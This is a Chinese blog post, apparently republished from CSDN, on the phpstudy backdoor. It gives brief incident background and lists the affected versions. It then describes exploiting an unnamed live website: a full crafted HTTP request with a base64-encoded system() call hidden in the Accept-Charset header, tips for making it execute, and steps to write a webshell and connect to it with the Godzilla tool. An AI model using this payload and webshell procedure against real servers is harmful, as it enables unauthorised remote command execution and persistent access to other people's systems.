phpstudy后门事件介绍
2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三方鉴定机构对软件中的“后门”进行司法鉴定,鉴定结果是该“后门”文件具有控制计算机的功能,嫌疑人已通过该后门远程控制下载运行脚本实现收集用户个人信息。在2019年9月20日,网上爆出phpstudy存在“后门”。
漏洞影响版本
phpstudy 2016版PHP5.4.45和PHP5.2.17,phpstudy2018版php-5.2.17和php-5.4.45存在后门。
实战利用
漏洞测试
某网站测试过程访问http://XXX/robots.txt发现存在多个禁止访问的目录文件。
User-agent: * Disallow: /plus/ad_js.phpDisallow: /plus/advancedsearch.phpDisallow: /plus/car.phpDisallow: /plus/carbuyaction.phpDisallow: /plus/shops_buyaction.phpDisallow: /plus/erraddsave.phpDisallow: /plus/posttocar.phpDisallow: /plus/disdls.phpDisallow: /plus/feedback_js.phpDisallow: /plus/mytag_js.phpDisallow: /plus/rss.phpDisallow: /plus/search.phpDisallow: /plus/recommend.phpDisallow: /plus/stow.phpDisallow: /plus/count.phpDisallow: /includeDisallow: /templets访问/plus/carbuyaction.php文件并利用burp抓包进行测试。
发现网站搭建使用的是php-5.4.45,尝试phpstudy后门漏洞。
构造payload:
注: Accept-Encoding的gzip, deflate 中间的逗号后面的空格去掉,不然命令执行不成功。
Accept-Charset 后面就是要执行的命令, 需要进行base64编码(这个漏洞相当于是eval()函数的代码执行,所以如果要执行os系统命令的话还要用system)。
GET /plus/carbuyaction.php HTTP/1.1Host: XXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip,deflateaccept-charset: c3lzdGVtKCd3aG9hbWknKTs=Connection: closeContent-Length: 2
直接命令执行成功,存在phpstudy后门漏洞。
写webshell
首先需要测试找到网站部署的路径,通过目录遍历发现一个php文件。
dede暴出网站路径。
同样利用命令执行写入webshell
哥斯拉连接成功。
来源地址:https://blog.csdn.net/weixin_42196211/article/details/127574002
